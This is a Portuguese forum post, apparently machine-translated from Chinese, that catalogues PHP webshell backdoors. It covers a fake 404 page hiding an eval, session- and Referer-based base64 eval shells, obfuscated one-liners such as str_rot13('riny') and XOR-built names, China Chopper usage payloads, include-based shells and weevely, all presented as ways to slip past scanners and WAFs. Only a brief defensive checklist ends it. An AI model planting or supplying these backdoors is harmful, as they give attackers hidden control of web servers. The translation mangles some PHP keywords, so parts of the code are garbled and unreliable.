Tratamos esses programas backdoor PHP com uma mentalidade de aprendizado, e muito código backdoor PHP nos permite ver o quão bem-intencionados são os programadores.
Backdoor poderoso de PHP em uma frase
Esse tipo de backdoor permite que sites eletrônicos,Administradores de servidores são muito problemáticos e frequentemente precisam mudar de métodos para realizar várias detecções, e muitas novas técnicas de escrita não podem ser descobertas e resolvidas com métodos comuns de detecção.
Hoje vamos contar alguns trojans PHP interessantes.
1. Esconda pôneis PHP usando 404 páginas:
[mw_shl_code=php,verdade] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Não Encontrado</title>
</head><body>
<h1>Não Encontrado</h1>
<p>A URL solicitada não foi encontrada neste servidor.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
cabeçalho ('HTTP/1.1 404 Não Encontrado');
?>[/mw_shl_code]
404 page é um arquivo comumente usado no site, e poucas pessoas o verificam e modificam depois de ser geralmente recomendado, então podemos usá-lo para esconder a porta dos fundos.
2. PHP oculto sem características em uma frase:
[mw_shl_code=php,true]<?php
session_start();
$_POST['código'] && $_SESSION['oCódigo'] = trim($_POST['código']);
$_SESSION['theCode']&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\'])','a');
?>[/mw_shl_code]
Atribua $_POST['código'] a $_SESSION['oCódigo'], e então execute $_SESSION['oCódigo'], destacando que não há código de assinatura.
Se você usar uma ferramenta de escaneamento para checar o código, ele não vai dar alarme e atingir o objetivo.
3. Backdoor super furtivo de PHP:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
A função GET sozinha constitui um Trojan;
Como usar:
[mw_shl_code=php,verdade]
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Após a execução, o diretório atual gera c.php um Trojan de sentença, quando o parâmetro A é avaliado, a geração do Trojan de erro falhou, e quando é assert, também reporta um erro, mas gera um cavalo de Troia, que não pode ser subestimado.
Solicitação de nível, código para rodar backdoor PHP:
Esse método é implementado com dois arquivos, o arquivo 1
[mw_shl_code=php,true]<?php
//1.php
cabeçalho('Tipo-conteúdo:text/html; Charset=UTF-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' & count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Documento 2
[mw_shl_code=php,true]<?php
//2.php
cabeçalho('Tipo-conteúdo:text/html; Charset=UTF-8′);
//要执行的代码
$code= <<<CÓDIGO
phpinfo();
CÓDIGO;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= array(
CURLOPT_URL => $url,
CURLOPT_HEADER => FALSO,
CURLOPT_RETURNTRANSFER => VERDADE,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Execute código base64 pelo HTTP_REFERER na requisição HTTP para alcançar o efeito backdoor.
É bom usar essa ideia para contornar o WAF.
4.PHP ferramenta geradora de backdoor weevely
Weevely é uma versão específica de PHPO software gratuito Webshell pode ser usado para simular um shell de conexão semelhante ao telnet. O Weevely geralmente é usado para exploração de programas web, ocultar backdoors ou usar métodos semelhantes ao telnet em vez de gerenciamento baseado em páginas web, o código PHP do lado do servidor gerado pelo Weevely é codificado base64, então pode enganar o software antivírus e IDS convencionais, Depois de enviar o código do lado do servidor, geralmente pode rodá-lo diretamente pelo Weevely.
As funções usadas na backdoor são funções de processamento de strings comumente usadas, e funções como eval e system usadas como regras de inspeção não aparecem diretamente no código, de modo que o arquivo backdoor pode contornar a verificação da ferramenta de busca backdoor. A varredura com a ferramenta de detecção de backdoor web do grupo escuro mostra que o arquivo não está ameaçado.
O acima é uma introdução geral, e os métodos de uso relevantes não são apresentados aqui, uma simples divulgação científica.
4. Três Trojans PHP deformados de uma frase
A primeira:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
O segundo
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ �”). ($_[+“”]|“”). ($_[+“”]^“�”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__'];?>[/mw_shl_code]
Escreva http://site/2.php?_=assert&__=eval($_POST['pass']) na faca de cozinha é passar.
Se você usar os dados adicionais da faca de cozinha, eles ficam mais ocultos, ou pode usar outras ferramentas de injeção, pois elas são post-submetidas.
O terceiro
[mw_shl_code=php,verdade] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'adicionar'); [/mw_shl_code]
str_rot13 ('riny') é a avaliação codificada, que evita completamente palavras-chave sem perder o efeito, fazendo as pessoas vomitarem sangue!
5. Por fim, liste alguns backdoors avançados de trojans PHP:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h']", "Acesso"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
incluir($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MeuArquivo][tmp_name],$_FILES[MeuArquivo][nome]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Acesso"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Resumindo, esses backdoors em PHP podem ser considerados completos; se você não tomar cuidado, certamente será enganado, e qual é a principal prioridade do nosso artigo hoje? Os pontos-chave estão no resumo abaixo!
Como lidar com o backdoor de uma frase do PHP:
Enfatizamos alguns pontos-chave e, se você leu este artigo, acredito que você não é leigo, então não vou me alongar:
- Esteja atento à segurança ao escrever programas PHP
- Os arquivos de log do servidor devem ser lidos com frequência e copiados com frequência
- Atribuição rigorosa de permissões para cada local
- Revisões frequentes de segurança em lote de arquivos e diretórios dinâmicos
- Aprenda a realizar a investigação manual de antivírus "Julgamento Comportamental e Eliminação"
- Fique ligado ou infiltre um acampamento de cibersegurança ativo
- Até mesmo uma função pode ser usada como regra para o processamento hierárquico do ambiente do servidor
Acreditamos que, quando houver mais sites para gerenciar e uma grande quantidade de dados, devemos aplicar razoavelmente algumas ferramentas auxiliares, mas não devemos depender totalmente delas; a tecnologia está sempre atualizando e melhorando, o mais importante é que você aprenda e entenda o raciocínio de escrever essas poderosas pessoas de backdoor, e a transposição de papéis pode trazer maior progresso.
|
Publicado em 01/12/2014 21:41:13
